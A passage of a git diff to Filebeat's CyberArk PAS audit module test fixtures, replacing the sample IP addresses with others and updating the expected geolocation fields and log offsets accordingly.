+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC.local\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -1074,17 +1080,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 55122,
+        "log.offset": 54910,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -1093,7 +1099,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC.local\\bart",
@@ -1112,42 +1118,43 @@
     {
         "@timestamp": "2021-03-16T09:50:19.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615888216",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "4",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "4",
         "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-16T09:50:19Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 02:50:19</Timestamp>\n    <IsoTimestamp>2021-03-16T09:50:19Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 02:50:19</Timestamp>\n    <IsoTimestamp>2021-03-16T09:50:19Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 16 02:50:19",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC.local\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -1158,17 +1165,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 59407,
+        "log.offset": 59151,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -1177,7 +1184,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC.local\\bart",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
index 71ac263e3f5a..01219805d4e4 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
@@ -23,11 +23,6 @@
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:43:44",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "retrieve ssh key",
@@ -101,11 +96,6 @@
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 13:08:48",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "retrieve ssh key",
@@ -177,11 +167,6 @@
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 15 06:18:52",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "retrieve ssh key",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
index 283cc15f94ec..d512d591f3c5 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
@@ -1,2 +1,2 @@
-<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
+<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
 <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:03:43</Timestamp>\n    <IsoTimestamp>2021-03-11T18:03:43Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>4</MessageID>\n    <Desc>User Authentication</Desc>\n    <Severity>Error</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>User Authentication</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>User Authentication</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
index edcea4388a2f..a3c58e23c0d8 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
@@ -8,7 +8,7 @@
         "cyberarkpas.audit.message": "User Authentication",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Error",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:42:36",
         "event.action": "authentication_failure",
         "event.category": [
@@ -34,22 +34,19 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -88,7 +85,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 584,
+        "log.offset": 583,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
index f3d9bd31a393..0c6f306c8a8e 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
 <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>50</MessageID>\n    <Desc>Store File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Store File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>50</MessageID>\n    <Desc>Store File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Store File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
 <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 11:45:26</Timestamp>\n    <IsoTimestamp>2021-03-11T19:45:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>50</MessageID>\n    <Desc>Store File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Store File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PVWAConfig</Safe>\n    <File>Root\\PVConfiguration.xml</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json
index f1d9caf02d7f..a4c608ad4920 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json
@@ -51,7 +51,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:21",
         "event.action": "store file",
         "event.code": "50",
@@ -71,19 +71,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -113,7 +110,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1194,
+        "log.offset": 1193,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -141,7 +138,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:56",
